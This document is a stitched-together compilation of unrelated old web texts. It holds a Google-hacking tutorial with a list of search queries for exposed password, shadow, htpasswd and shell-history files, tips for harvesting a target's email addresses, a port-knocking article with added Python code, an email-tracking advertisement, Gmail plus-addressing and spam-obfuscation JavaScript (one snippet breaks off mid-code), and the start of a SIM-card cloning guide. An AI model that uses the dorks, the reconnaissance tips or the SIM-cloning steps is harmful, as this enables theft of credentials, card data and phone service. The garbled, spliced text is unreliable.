-Make searches as specific as you can.
-Keep searches as specific as you can!
+Note: The more specific you want your search to be, the more words you need, and you'll get fewer results
(this can be a bad or good thing)

B. How it works
-When you search for hacker tutorials, google interprets it as hacker AND tutorials, so it returns only pages
with all of the keywords you entered by default
-When you search for tutorials for hackers, the word for is omitted, as are all other words like if, a, who,
what, when, where, and how. If you need to include a common word in your search phrase use a '+' before the
common word. Your search is now tutorials +for hackers.
+note: google is not case sensitive
+note: google does not use wildcards (searching for googl* will not return google)
(ADVANCED)

A. ""'s
-Using quotations is probably the most important part of an advanced search. You can really control the
results of your search using quotes. When you use quotes, all of your results will contain the exact phrase.
So if you were to search "Tutorial for hacking" Google would search 3,083,324,652 web sites for that exact
phrase.
-You can put part of your search in quotes, and the other a regular search. For instance, if I wanted to find
out what pages my friend that just happens to be a girl is on on the internet, I would search "Firstname
Lastname" Thomas Dale. This would search for the exact phrase "her name" and then it would search for any
pages that contained the words Thomas Dale (Thomas Dale is my high school).

+Find me! My name is alejandro(alex), and i'm part of the smart-dev community ;)
B. "-"'s

-Using '-' to omit results. Perhaps you're searching for a new type of password file, for a new webserver.
The password file is called passwerd.db, but when you do a simple in title search (just keep reading, you'll
understand later) all you get is a bunch of results that turn out to be a config file that has syntax
referring to passwerd.db. Let's say this config file is named config (go figure). Omit this from your search
simply by searching searchstring -config and voilà, you get a list of sites that display passwerd.db to the
public! You can also use the boolean term NOT.
(HACKING/CRACKING)

Yay! This is why I wrote this article!

INTRO TO HACKING/CRACKING WITH GOOGLE
-Many of you probably already know this, but you can hack/crack with google. I use it in 100% of the
hacks/cracks I perform. You can use google to help you hack/crack in a few different ways. I will discuss
these in the sections below ("no shit!")

A. intitle:
-This is a built in function in google that searches for your phrase in the title of a web page. The
title of a webpage is in the upper left of your current window. (you should see google.txt if someone
hasn't changed the name). This is useful if you want to find something VERY specific.
-examples: intitle:"billing" intitle:"payments" intitle:"passwd"
B. Directory Indexing

-One GREAT trick is to find sites that allow directory indexing. This can be done by searching
intitle:"index of" phrase. Your mind should now be about to explode with the possibilities this could
hold. If it doesn't, that's ok, because if you look at the end of this article you'll see I've
provided you with an uber cool list! Here are some basic phrases you can use: intitle:"index of"
"passwd" OR "passwd.txt" OR "AutismIsSoCool!". This searches for files named passwd or if that isn't
found, searches for passwd.txt or if that isn't found searches for AutismIsSoCool! Think original, and
you can come up with the coolest stuff! I'm not just talking about passwords... I'm talking about
warez, passwords, and even credit card numbers!!! (although to be honest it's not easy ;))

C. allinurl:
-Guess what this does! Basically I use this when I want to find a piece of software. When I'm at school we
have some stupid web site filter, that doesn't allow me to download AIM (AOL instant messenger uhhh tm) so
basically I just do a search for allinurl:"aim.exe" and I get to take my pick! This can also be used for
passwd, passwd.txt, and so on

D. Cache
-Perhaps you have been searching for intitle:"index of" etc/shadow, and you see what looks like a valid
shadow file in your results list, but you can't access it, because you aren't root, or whatever. Well thanks to
google cache, it may be possible for you to view this file. Just click the little cached link under the
result!
+note: this doesn't work 100% of the time

E. Collecting info on your target

-You can use google to find all sorts of juicy information about your target. For instance, if you wanted to
know what @target.com addresses were on the site, just search "@target.com" site:www.target.com. You should
get a nice list of email addresses. (these can double as usernames for other things besides emails)
-GOOGLE GROUPS is a great way to get info on a target. Just click the groups tab and search for @target.com,
and you will see everything anyone from your target has EVER posted on a usenet board! This is a real good
one!

THATS IT! THAT'S THE WHOLE TUTORIAL!

Summary: Well I hope you learned something from this article. Whether you were a complete noob, an advanced internet user,
or an ereet hacker, I tried to teach you all something. Remember- don't ever give up after only a few minutes of
searching... You'll get the right combination of keywords sooner or later. Just try to imagine what words you would use
for the item you are trying to find ;). Now GO! I officially deem you "Google lord!"

(APPENDIX A)

-This is a list of all the cool searches I've found over the years
-PLEASE add to it! add your searches, and put the date you added it next to the search, then upload it somewhere

allinurl: winnt/system32/ (get cmd.exe)
intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart **GOOD ONE!

-and hey! wouldn't you know it! someone has already taken care of the rest of this appendix for me! Thanks Johnny!

/*/*/*The following list was taken from johnny.ihackstuff.com*\*\*\
_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

Port knocking is a clever new computer security trick. It's a way to configure a system so that only systems who know the "secret knock" can access a certain port. For example, you could build a port-knocking defensive system that would not accept any SSH connections (port 22) unless it detected connection attempts to closed ports 1026, 1027, 1029, 1034, 1026, 1044, and 1035 in that sequence within five seconds, then listened on port 22 for a connection within ten seconds. Otherwise, the system would completely ignore port 22.

It's a clever idea, and one that could easily be built into VPN systems and the like. Network administrators could create unique knocks for their networks -- family keys, really -- and only give them to authorized users. It's no substitute for good access control, but it's a nice addition. And it's an addition that's invisible to those who don't know about it.

Firewall administrators are challenged to balance flexibility and security when designing a comprehensive rule set. A firewall should provide protection against malfeasants, while allowing trusted users to connect. Unfortunately, it is not always possible to filter out the bad guys, because filtering on the basis of IP addresses and ports does not distinguish connecting users. Bad guys can and do come from trusted IP addresses. Open ports remain a necessary vulnerability: they allow connections to applications but also may turn into open doors for attack. This article presents a new security system, termed port knocking, in which trusted users manipulate firewall rules by transmitting information across closed ports.

Briefly, users make connection attempts to sequences of closed ports. The failed connections are logged by the server-side packet filtering firewall and detected by a dæmon that monitors the firewall log file. When a properly formatted knock sequence, playing the role of the secret used in the authentication, is received, firewall rules are manipulated based on the information content of the sequence. This user-based authentication system is both robust, being mediated by the kernel firewall, and stealthy--it's not possible to detect whether a networked machine is listening for port knocks. Port knocking does not require any open ports, and it can be extended to transmit any type of information encoded in a port sequence.

In commonly deployed firewalls, filtering is done either by the IP address of the connecting host or by the port to which this host is connecting. Firewalls examine and interact with packets before any user authentication takes place; therefore, they do not discriminate amongst the users making the connection. It is expected that once the firewall has approved the packet and allowed it to enter the network, downstream applications will handle user authentication. Normally, this provides a sufficient balance between protection and flexibility. Some IP ranges, say cracker-friendly Internet cafés, may be closed completely to incoming traffic, while hosts in other IP ranges may be allowed to connect to ports otherwise unavailable to the general public (proprietary/sensitive applications). Unfortunately, this type of IP-based filtering has the potential to lock out trusted users from your system. Flexibility is limited by the fact that nobody from the blocked IP ranges can connect, regardless of their trust statuses. At the same time, protection is undermined by the fact that anyone from the blocked IP range physically can travel and connect from an unfiltered host. In the end, as long as ports remain open, network applications are susceptible to attack. Using intrusion detection systems and keeping applications up to date can go a long way towards providing protection, but they do so against only known, derivative or anticipated attacks. To eliminate the risk associated with publicly open ports, port knocking provides an authentication system that works across closed ports. The use of these ports, however, has to be subverted because all packets are denied. Fortunately, in most firewalls that perform even the most rudimentary logging, information already is flowing across closed ports in the form of entries in a log file indicating connection attempts. Consider the following example.

A handful of ports (100-109) are configured to deny all traffic--no ICMP error packets are sent back to the connecting client--and all attempted connections are logged. In this example, the firewall IP is IPF and the connecting client IP is IPC. The appropriate ipchains command to close the ports and log connections is:

ipchains -A input -p tcp -s 0/0 -d IPF/32 100:109 -j DENY -l

A user attempts to connect from IPC to the following firewall ports in sequence: 102,100,100,103. From the point of view of the user, the connections fail silently. On the firewall, though, the 102,100,100,103 number sequence has been recorded.

Feb 12 00:13:26 ... input DENY eth1 PROTO=6 IPC:64137 IPF:102 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64138 IPF:100 ...
Feb 12 00:13:27 ... input DENY eth1 PROTO=6 IPC:64139 IPF:100 ...
Feb 12 00:13:28 ... input DENY eth1 PROTO=6 IPC:64140 IPF:103 ...

The knock sequence appears in the firewall log, and the user has transmitted data across the closed ports.

Any implementation of the port knocking system needs to provide some basic functionality. First, some way to monitor the firewall log file needs to be devised. A simple Perl application that tails the file is presented in Listing 2, discussed more fully later in the article. Second, a method is required to extract the sequences of ports from the log file and translate their payload into usable information. In this step it is important to be able to (a) detect when a port sequence begins and ends, (b) correctly detect a port sequence in the presence of spurious connection attempts that are not part of the sequence and (c) keep track of multiple port sequences arriving at the same time from different remote IPs. The encoding used to generate the port sequence can be designed to minimize the length of the sequence.

For example, the sequence 100,102 could correspond to one or a series of predefined operations (for example, open port ssh/22 for 15 minutes for a specific IP and then close the port). Finally, once the information is derived from the sequence, the implementation must provide some way to manipulate the firewall rules.


One of the key features of port knocking is it provides a stealthy method of authentication and information transfer to a networked machine that has no open ports. It is not possible to determine successfully whether the machine is listening for knock sequences by using port probes. Thus, although a brute-force attack could be mounted to try to guess the ports and the form of the sequence, such breach attempts could be detected easily. Second, because information is flowing in the form of connection attempts rather than in typical packet data payload, without knowing that this system is in place it would be unlikely that the use of this authentication method would be detected by monitoring traffic. To minimize the risk of a functional sequence being constructed by the intercepting party, the information content containing the remote IP of the sequence can be encrypted. Third, because the authentication is built into the port knock sequence, existing applications need not be changed. Implementing one-time passwords is done easily by adjusting the way particular sequences are interpreted. A sequence could correspond to a request that a port be opened for a specific length of time and then closed and never opened again to the same IP. Furthermore, a one-time pad could be used to encrypt the sequence, making it indecipherable by those without the pad.

Disadvantages of Port Knocking
To use port knocking, a client script that performs the knock is required. The client and any associated data should be considered a secret and kept on removable media, such as a USB key. The use of the client imposes an overhead for each connection. Certain locations, such as libraries or Internet cafés, may not allow execution of arbitrary programs. In order to use port knocking, a number of ports need to be allocated for exclusive use by this system. As the number of such ports increases, the knock sequence becomes shorter for a given amount of information payload, because the number of coding symbols is increased. Practically, 256 free privileged ports (in the 1-1024 range), not necessarily contiguous, usually can be allocated and used to listen for port knocks. Finally, any system that manipulates firewall rules in an automated fashion requires careful implementation. For the scenario in which no ports are initially open, if the listening dæmon fails or is not able to interpret the knocks correctly, it becomes impossible to connect remotely to the host.


Applications
In this section, three examples are outlined that illustrate how the port knocking system can be used.

1. Single Port, Fixed Mapping

Connection to only one port (ssh/22) is required. The ssh dæmon is running; all privileged ports are closed, including ssh/22; and packets addressed to ports 30,31,32 are being logged. The following port sequences are recognized:

31,32,30 open ssh/22 to connecting IP
32,30,31 close ssh/22 to connecting IP
31,30,32 close ssh/22 to connecting IP and disregard further knocks from this IP

The justifiably paranoid administrator can open the ssh/22 port on his system by initiating TCP connections to ports 31,32,30. At the end of the ssh session, the port would be closed by using the second sequence shown above. If the host from which the administrator is connecting is not trusted (if, say, keystrokes may be snooped), the use of the third sequence would deny all further traffic from the IP, preventing anyone from duplicating the session. This assumes the port sequence and system login credentials are not captured by a third party and used before the legitimate session ends. In this example, only three sequences are understood by the system, as the requirements call for only a handful of well-defined firewall manipulations. The sequences were chosen not to be monotonically increasing (30, 31, 32), so they would not be triggered by remote port scans. If multiple ports are to be protected by this system, a mapping needs to be derived between the port sequence and a flexible firewall rule. This is covered in the next example.

2. Multiple Port, Dynamic Mapping

In this example, a network may be running any number of applications. Ports 100-109 are used to listen to knocks. The port sequence is expected to be of the form:

102,100,110   10a,10b,10c,10d   10(a+b+c+d mod 10)   110,100,102
header        payload           checksum             footer

The first and last three ports let the port knocking dæmon know that a sequence is starting and ending. The next four ports encode the port (abcd) to be opened. For example, if a connection to port 143 is required, the sequence would be 100,101,104,103. The final element in the sequence is a checksum that validates the sequence payload. In this example, the checksum is 8 (1+4+3 mod 10). The sequence element therefore is 108, and the full sequence would be

102,100,103 100,101,104,103 108 103,100,102

When this sequence is detected, port 143 would be made available to the incoming IP address. If the port is open already, the knock would render it closed. The knock can be extended to include additional information, such as an anticipated session length, that can be used to close the port after a set amount of time.

3. Mapping with Encryption

The information contained in the knock sequence can be encrypted to provide an additional measure of security. In this example, 256 ports are allocated and logged. A knock map of the form

remote IP port time checksum

is used where the remote IP, port, time and checksum (sum of other fields mod 255) are encrypted. The encrypted string can be mapped onto eight unsigned chars using Perl's pack("C*",STRING) command, see Listing 1.

Listing 1. Mapping the Encrypted String

Implementation
A minimal prototype Perl implementation of port knocking is presented. The implementation is comprised of a knockclient, responsible for originating the knock sequence, and a knockdæmon, responsible for monitoring the firewall log and manipulating the rules.


Knockclient
The complete client is shown in Listing 1. Lincoln Stein's Crypt::CBC module is used as proxy to Crypt::Blowfish to carry out encryption. The unencrypted knock sequence is comprised of seven values: four IP bytes, a port (limited to the range 0-255 in this implementation), a time flag and a checksum (mod 255). The time flag determines how the dæmon reacts: 0 to open the port, 255 to close the port and any other value in the 1-254 range to open the port and then close it after that many minutes. The knock on the firewall (IP=IPF) to open port ssh/22 on IP=IPC and then have the port close after 15 minutes would be executed by calling the client as follows:

knockclient -i IPC -r IPF -p 22 -t 15

The client packs the list of seven integers, performs the encryption and unpacks the string into unsigned chars (0-255). These values are then mapped onto a sequence of ports in the 745-1000 range.

Knockdæmon
The knockdæmon is shown in Listing 2. This application uses File::Tail to look for new lines in the firewall log file. Lines corresponding to connection attempts to ports 745-1000 are parsed for the remote IP and port number. An 8-element queue storing the ports is maintained for each incoming IP. When the queue size reaches 8, its contents are decrypted. If the decryption is successful and the checksum is correct, appropriate action is taken and the queue is cleared. If the decryption fails, the oldest queue port element is removed and the dæmon continues monitoring.

Listing 2. knockdæmon

The firewall rules are manipulated by a system call to the ipchains binary, although the IPChains Perl module by Jonathan Schatz also may be used. If the port is to be closed, as indicated by the time flag, Jose Rodrigues' Schedule::At module is used to schedule the deletion of the rule using the at queue system.
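
The following added example (Python, not the article's Perl listings) implements both sides of the unencrypted dynamic-mapping knock from example 2: the client encoding, and a dæmon that parses log lines, keeps one queue per client IP and validates header, checksum and footer. It takes the header 102,100,103 and footer 103,100,102 from the worked sequence above; the IP addresses and log lines are constructed, and the dæmon returns the rule change as a tuple instead of calling ipchains.

```python
import re
from collections import defaultdict, deque

KNOCK_BASE = 100              # knock ports 100-109 carry one decimal digit each
HEADER = (102, 100, 103)      # start marker, from the article's worked sequence
FOOTER = (103, 100, 102)      # end marker
SEQ_LEN = len(HEADER) + 4 + 1 + len(FOOTER)   # header, payload, checksum, footer

# Fields visible in the article's log excerpt: chain, action, interface,
# protocol, source IP:port and destination IP:port.
LOG_RE = re.compile(
    r"input DENY \S+ PROTO=6 "
    r"(?P<src>\d+(?:\.\d+){3}):\d+ (?P<dst>\d+(?:\.\d+){3}):(?P<dport>\d+)"
)


def encode_knock(port):
    """Client side: the port sequence that asks the firewall to toggle `port`."""
    if not 0 <= port <= 9999:
        raise ValueError("the payload holds four decimal digits")
    digits = [int(c) for c in f"{port:04d}"]
    checksum = sum(digits) % 10
    return [*HEADER, *(KNOCK_BASE + d for d in digits), KNOCK_BASE + checksum, *FOOTER]


def decode_window(window):
    """Return the requested port if `window` is one complete, valid knock, else None."""
    ports = tuple(window)
    if len(ports) != SEQ_LEN or ports[:3] != HEADER or ports[-3:] != FOOTER:
        return None
    digits = [p - KNOCK_BASE for p in ports[3:7]]
    if any(not 0 <= d <= 9 for d in digits):
        return None
    if ports[7] - KNOCK_BASE != sum(digits) % 10:
        return None               # checksum mismatch: damaged or guessed sequence
    return int("".join(str(d) for d in digits))


class KnockDaemon:
    """Keeps one sliding window of knock ports per client IP (requirement c)."""

    def __init__(self, firewall_ip):
        self.firewall_ip = firewall_ip
        self.windows = defaultdict(lambda: deque(maxlen=SEQ_LEN))
        self.open_rules = set()   # (client_ip, port) pairs currently allowed

    def feed(self, line):
        """Process one log line; return ('open'|'close', client_ip, port) or None."""
        m = LOG_RE.search(line)
        if not m or m["dst"] != self.firewall_ip:
            return None
        dport = int(m["dport"])
        if not KNOCK_BASE <= dport <= KNOCK_BASE + 9:
            return None           # denied connection to a non-knock port: ignored
        window = self.windows[m["src"]]
        window.append(dport)      # a full deque drops its oldest knock (requirement b)
        port = decode_window(window)
        if port is None:
            return None
        window.clear()
        rule = (m["src"], port)
        if rule in self.open_rules:   # knocking for an open port closes it
            self.open_rules.remove(rule)
            return ("close", *rule)
        self.open_rules.add(rule)
        return ("open", *rule)


def sample_log(firewall_ip="198.51.100.1"):
    """Constructed log lines (documentation IPs), shaped like the article's excerpt."""
    client_a, client_b = "192.0.2.10", "192.0.2.77"
    knocks_a = [105, 101] + encode_knock(143)   # two stray knocks, then a valid request
    knocks_b = encode_knock(22)
    knocks_b[7] = 100                           # wrong checksum digit: must be rejected
    prefix = "fw kernel: input DENY eth1 PROTO=6"
    lines = []
    for i in range(len(knocks_a)):              # interleave the two clients
        if i == 5:                              # mid-sequence noise on a non-knock port
            lines.append(f"Feb 12 00:13:05 {prefix} {client_a}:64100 {firewall_ip}:8080")
        for src, seq in ((client_a, knocks_a), (client_b, knocks_b)):
            if i < len(seq):
                lines.append(
                    f"Feb 12 00:13:{i:02d} {prefix} {src}:{64000 + i} {firewall_ip}:{seq[i]}"
                )
    return lines


def run_sample():
    """Feed the constructed log to a dæmon and collect the rule changes it decides on."""
    daemon = KnockDaemon("198.51.100.1")
    actions = [daemon.feed(line) for line in sample_log()]
    return [a for a in actions if a is not None]


if __name__ == "__main__":
    for action in run_sample():
        print(action)
```

Because the payload and checksum are sent in the clear, anyone who observes one sequence can replay it, which is the gap the encrypted mapping of example 3 addresses.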


Conclusion
Port knocking is a stealthy authentication system that employs closed ports to carry out identification of trusted users. This novel method provides the means of establishing a connection to an application running on a completely isolated system on which no ports initially are open.



What is MailTracking?
MailTracking is the most powerful and reliable email tracking service that exists today. In short - MailTracking tells you when email you sent gets read / re-opened / forwarded and so much more
How do I send a tracked email?
There are two ways you can send tracked emails:

  1. Simply add: .mailtracking.com to the end of your recipients email address (they won’t see this)
    or
  2. Install the ActiveTracker plugin to add the tracking for you.
Testing? If you send tracked emails to yourself, your anti-spam filters may block them (people don’t usually write to themselves) - so we recommend you test by sending to other people.
What will you tell me about the tracked emails I send?
MailTracking will endeavour to provide the following in your tracking reports:

  • Date and time opened
  • Location of recipient (per their ISP city /town)
  • Map of location (available on paid subscriptions)
  • Recipients IP address
  • Apparent email address of opening (if available)
  • Referrer details (ie; if accessed via web mail etc)
  • URL clicks
  • How long the email was read for
  • How many times your email was opened
  • If your email was forwarded, or opened on a different computer
All messages sent via MailTracking benefit from the SPF compliant and Sender-ID compliant mail servers. This confirms safe transmission of your messages, and also enables us to report delivery status to you (including: bounce-backs, delays and success notifications). Delivery information is listed in your Personal Tracking Page. Note: MailTracking.com does not use or contain any spy-ware, mal-ware, nor vi‌rues, it is not illegal to use, and does not breach any privacy regulations in any countries.
What else does MailTracking do?
There are lots of great features available to you - these include the following sending options:
  • Certified email
  • Ensured-Receipts and retractable emails
  • Invisible tracking
  • Self-Destructing emails
  • Block printing
  • Block forwarding
  • Adobe Acrobat PDF Document Tracking
  • Secure Encrypted emails
  • Track MS Word or Excel documents
You can also choose how to receive your receipts:
  • In your Personal Tracking Page (when you log in)
  • Email ReadNotifications
  • Legal Proof-of-Opening receipts
  • Delivery Service Notifications (DSN’s)
  • SMS alert on your cell-phone or pager
  • Instant Messenger

Gmail has an interesting quirk where you can add a plus sign (+) after your Gmail address, and it’ll still get to your inbox. It’s called plus-addressing, and it essentially gives you an unlimited number of e-mail addresses to play with. Here’s how it works: say your address is pinkyrocks@gmail.com, and you want to automatically label all work e-mails. Add a plus sign and a phrase to make it pinkyrocks+work@gmail.com and set up a filter to label it work (to access your filters go to Settings->Filters and create a filter for messages addressed to pinkyrocks+work@gmail.com. Then add the label work).

More real world examples:
Find out who is spamming you: Be sure to use plus-addressing for every form you fill out online and give each site a different plus address.

Example: You could use
pinkyrocks+nytimes@gmail.com for nytimes.com
pinkyrocks+freestuff@gmail.com for freestuff.com
Then you can tell which site has given your e-mail address to spammers, and automatically send them to the trash.

Automatically label your incoming mail:
I’ve talked about that above.

Archive your mail: If you receive periodic updates about your bank account balance or are subscribed to a lot of mailing lists that you don’t check often, then you can send that sort of mail to the archives and bypass your Inbox.

Example: For the mailing list, you could give
pinkyrocks+mailinglist1@gmail.com as your address, and assign a filter that will archive mail to that address automatically. Then you can just check in once in a while on the archive if you want to catch up.

Update (9/7) :
Several commenters have indicated that this is not a Gmail specific trick. kl says Fastmail has enabled this feature as well. caliban10 reports that a lot of sites reject addresses with a plus sign. You might use other services like Mailinator for disposable addresses instead. pbinder recommends using services like SpamGourmet, which redirects mail to your real address.
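
The "find out who is spamming you" idea above, as an added example that is not part of the original post: it groups messages flagged as spam by the plus tag they were sent to. The function names, the message shape ({to, spam}) and the sample inbox are assumptions made for this sketch.

```javascript
// Added example: attribute spam to the site that leaked a plus-address.
// All addresses and messages below are constructed sample data.

// Split "local+tag@domain" into its parts. Returns null for anything that is
// not a bare address (display names and quoted local parts are rejected).
function parsePlusAddress(address) {
  const m = /^([^\s@+"]+)(?:\+([^\s@"]*))?@([^\s@]+)$/.exec(String(address).trim());
  if (!m) return null;
  return {
    // The mailbox the mail really lands in, compared case-insensitively.
    base: (m[1] + "@" + m[3]).toLowerCase(),
    // Everything after the first "+", or null when there is no tag.
    tag: m[2] === undefined || m[2] === "" ? null : m[2].toLowerCase(),
  };
}

// Count spam per tag for one mailbox. Mail for other mailboxes is ignored.
// Spam sent to the bare address is counted as "(untagged)": a sender can
// strip "+tag" before mailing, so that bucket cannot be attributed.
function attributeSpam(messages, ownAddress) {
  const own = ownAddress.toLowerCase();
  const counts = new Map();
  for (const msg of messages) {
    if (!msg.spam) continue;
    const parsed = parsePlusAddress(msg.to);
    if (!parsed || parsed.base !== own) continue;
    const key = parsed.tag === null ? "(untagged)" : parsed.tag;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  // Highest count first, ties broken alphabetically.
  return [...counts.entries()].sort(
    (a, b) => b[1] - a[1] || a[0].localeCompare(b[0])
  );
}

// Constructed sample inbox.
const sampleInbox = [
  { to: "pinkyrocks+nytimes@gmail.com", spam: false },
  { to: "pinkyrocks+freestuff@gmail.com", spam: true },
  { to: "PinkyRocks+FreeStuff@Gmail.com", spam: true },
  { to: "pinkyrocks@gmail.com", spam: true },
  { to: "pinkyrocks+work@gmail.com", spam: false },
  { to: "someoneelse+freestuff@gmail.com", spam: true },
  { to: "not an address", spam: true },
];

for (const [tag, n] of attributeSpam(sampleInbox, "pinkyrocks@gmail.com")) {
  console.log(tag + ": " + n);
}
```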

To hide files and folders for your privacy, they can be hidden through the registry editor
> go to run & type "regedit"
> go to HKEY_LOCAL_MACHINE
> go to SOFTWARE
> go to Microsoft
> go to Windows
> go to CurrentVersion
> go to Explorer
> go to Advanced
> go to Folder
> go to Hidden
> go to SHOWALL
> then, doubleclick on the DefaultValue & in the Value data, change the value into 0 from 1
> then open Explorer and go to Folder Options
> after that, select the "Do not show hidden files and folders" option
> after doing this, your files and folders (which must already have been marked hidden) stay hidden even if you select the "Show hidden files and folders" option
> to show those hidden files and folders again, change this value back to 1 in regedit

Ever wondered how all that spam reached your inbox despite you never submitting your id to any web form? Chances are that you have a web page of your own on which you have openly disclosed your email address, and it was preyed on by spam bots. So how to avoid it? Simple answer would be not to have a web page at all. Since that is not feasible (ok.. sorry!) the next best thing would be not to have your email id on your site. But that would mean nobody would be able to effectively contact you. So here are some techniques that allow your email to be human readable, but not spammable.

I suppose you know how to embed JavaScript in HTML. If not, then just enclose any code given below between <script> and </script> tags wherever you want the text to be displayed.
Method 0 : Plain English

This one's not really a method, it is more common sense. Instead of the symbols '@' and '.' expand them in English. That is, instead of 'foo@yafoo.com' use 'foo at yafoo dot com'. The problem is that you cannot make your email address clickable and it is really simple for the spam bots to track it down anyway. But this could be the only solution if you want to post your id in a forum or somewhere that does not allow you to use the script tags. (Like this article page, for example. At least something is better than nothing.)
Method 1 : The String Splitter

The easiest method would be to split your email into substrings. i.e if your email is foo@yafoo.com, have it split into 'foo', '@', 'yafoo','.com'. and then join them together. eg:
x1 = 'foo';
x2 = '@';
x3 = 'yafoo';
x4 = '.com';
document.write ('mailto:' + x1 + x2 + x3 + x4);


Good! But the problem with this is that it is too commonly used nowadays and the spam bots MIGHT be smart enough to parse a bit of basic JavaScript.
Method 2 : ASCII - 47

Method two involves writing ASCII codes. Each letter can be written using its ASCII value in the format &#charcode; For example 'A' can be rendered by using the entity &#65; You'll have to find out the ASCII code for each letter of your email address. The values for A-Z are 65 to 91, for a-z are 97 to 122. '@' has the value of 64 and '.' has the value of 46. Therefore the email 'foo@yafoo.com' can be written as...
x1 = '&#102;&#111;&#111;';
x2 = '&#64;';
x3 = '&#121;&#97;&#102;&#111;&#111;';
x4 = '&#46;&#99;&#111;&#109;';
document.write ('mailto:' + x1 + x2 + x3 + x4);

For your aid, here's a simple script to find all ASCII codes:
for (i=32;i<=255;i++) { document.write (i + ' : ' + '&#' + i + '; ' ); }

This method is a bit trickier than the first. But again the problem is that it is common and can be parsed, though it needs some effort.
Method 3 : XOR Encryptor

So the next stop is encryption. Why not encrypt your email id using the humble powers of JavaScript? Here I will explain the simplest of them all... XORing. The principle is that when you XOR a string with a key you get an encrypted string, and when you XOR the encrypted string with the same key, you get back the original string. Now you might wonder what XOR is. It is a logical operation done on bits and stands for eXclusive OR. Try Google to find out what the hell that means, if you care. Now the plan is to first get your string encrypted, then post the encrypted string on to your website and decrypt it there using JavaScript. First of all to the encryption. Run this code on your browser, the purpose is to get the encrypted string. The key I have used here is the number '5'. The '^' is the XOR operator in JavaScript.
y = ""; for(i=0;i
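
The entity encoding of Method 2 and the XOR round trip of Method 3, as an added example that is not the original article's code (the article's own XOR listing is cut off on this page). The key 5 is the one the article names; the function names are assumptions. It also covers a case the article does not mention: XOR output can contain a quote or a backslash, so the encoded address is embedded as numbers rather than as a string literal.

```javascript
// Added example, not the article's code. KEY = 5 is the key the article
// names; every function name here is made up for this sketch.
const KEY = 5;

// Method 2: each character as a numeric character reference (&#NNN;).
function toEntities(text) {
  return Array.from(text, (ch) => "&#" + ch.codePointAt(0) + ";").join("");
}

// Inverse of toEntities, i.e. what the browser's HTML parser does on render.
function fromEntities(markup) {
  return markup.replace(/&#(\d+);/g, (_, code) =>
    String.fromCodePoint(Number(code))
  );
}

// Method 3: XOR every UTF-16 code unit with the key.
function xorCodes(text, key) {
  const codes = [];
  for (let i = 0; i < text.length; i++) codes.push(text.charCodeAt(i) ^ key);
  return codes;
}

// XOR is its own inverse: xorString(xorString(s, k), k) === s.
function xorString(text, key) {
  return String.fromCharCode(...xorCodes(text, key));
}

// Build the inline script to paste between <script> tags. With key 5 a "Y"
// becomes a backslash and an apostrophe becomes a double quote, either of
// which would break a quoted string, so the XORed values are emitted as a
// numeric array and decoded in the browser.
function buildSnippet(address, key) {
  return (
    "var c=[" + xorCodes(address, key).join(",") + "],a='';" +
    "for(var i=0;i<c.length;i++){a+=String.fromCharCode(c[i]^" + key + ");}" +
    "document.write('<a href=\"mailto:'+a+'\">'+a+'</a>');"
  );
}

// Constructed sample address, the one used throughout the article.
const sampleAddress = "foo@yafoo.com";
console.log(toEntities(sampleAddress));
console.log(xorString(sampleAddress, KEY));
console.log(buildSnippet(sampleAddress, KEY));
```

Both encodings only raise the cost of harvesting; anything the browser can decode, a bot that runs JavaScript can decode too.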

Warning! Proceed at your own risk! Your provider can block your subscription!

If your carrier SIM card is not V1 this method will NOT work, because U CAN'T get Ki number from chip! Basically V1 SIM cards are at least 7 years "old" SIMs. U CAN'T know for sure if your SIM is V1, V2 or V3 before u try to extract Ki with WORONSCAN software (download below). If Woronscan can't extract Ki number, your SIM IS NOT V1, and U CAN NOT proceed!


INFO for other sites admins - Do Not Copy-Paste this tutorial on your site because this tutorial is updated almost daily so u will have a "wrong" tutorial at your sites. If U must, put a link to this thread at your site. Thank U!

Thanks to Vladimir_CDI,ozbimmer


U will need::

1. an iPhone
2. SIM Reader/Writer (Infinity USB Unlimited, Dynamite Programer(I used this) ,etc...)
3. SilverCard (http://img131.imageshack.us/my.php?i...cardtipfq1.jpg)
4. Your SIM card (It must be a V1 ,U must be able to get Ki number)
5. Download :
SimEmu 6.01 - http://simemu.gsmhosting.net/SIM_EMU_6.01_CFG_v2.1.zip
Woronscan 1.09 - http://www.kinforce.com/down/kinforc...rsim/ws109.zip



